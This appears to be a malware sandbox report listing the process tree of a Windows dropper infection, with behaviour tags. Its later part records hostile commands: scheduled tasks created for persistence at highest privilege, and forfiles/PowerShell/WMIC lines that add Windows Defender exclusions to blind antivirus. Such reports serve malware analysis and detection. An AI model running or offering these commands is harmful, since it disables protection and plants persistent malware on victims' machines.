C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2384 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5136 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1040 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6308 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1528 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6284 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Users\Admin\AppData\Local\Temp\01-bd019-b4b-573a8-587d4e69b2be0\Jyjunanuvy.exe"C:\Users\Admin\AppData\Local\Temp\01-bd019-b4b-573a8-587d4e69b2be0\Jyjunanuvy.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kkvol0fo.wye\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\kkvol0fo.wye\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kkvol0fo.wye\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 30411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exeC:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631870605 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kdlxf5tf.uni\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\kdlxf5tf.uni\anyname.exeC:\Users\Admin\AppData\Local\Temp\kdlxf5tf.uni\anyname.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qqqx40h.mcj\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\3qqqx40h.mcj\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3qqqx40h.mcj\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 30411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\papzes35.ayt\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri007b1b030a1a32.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri007b1b030a1a32.exeFri007b1b030a1a32.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 3126⤵
- Drops file in Windows directory
- Program crash
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri000fb585dc0ad7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri000fb585dc0ad7.exeFri000fb585dc0ad7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00515c9ed9622f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00515c9ed9622f.exeFri00515c9ed9622f.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\uGAIOsy0cyBMLy0x8qQhbIb9.exe"C:\Users\Admin\Documents\uGAIOsy0cyBMLy0x8qQhbIb9.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Y4E4zZMnDLS2jIMVnr7Dq9f1.exe"C:\Users\Admin\Documents\Y4E4zZMnDLS2jIMVnr7Dq9f1.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\7WTxqNFpB1liTiZex_hE7hPk.exe"C:\Users\Admin\Documents\7WTxqNFpB1liTiZex_hE7hPk.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\62WXs31DiU_lPqVBteJRXwxj.exe"C:\Users\Admin\Documents\62WXs31DiU_lPqVBteJRXwxj.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSEC01.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSEE33.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
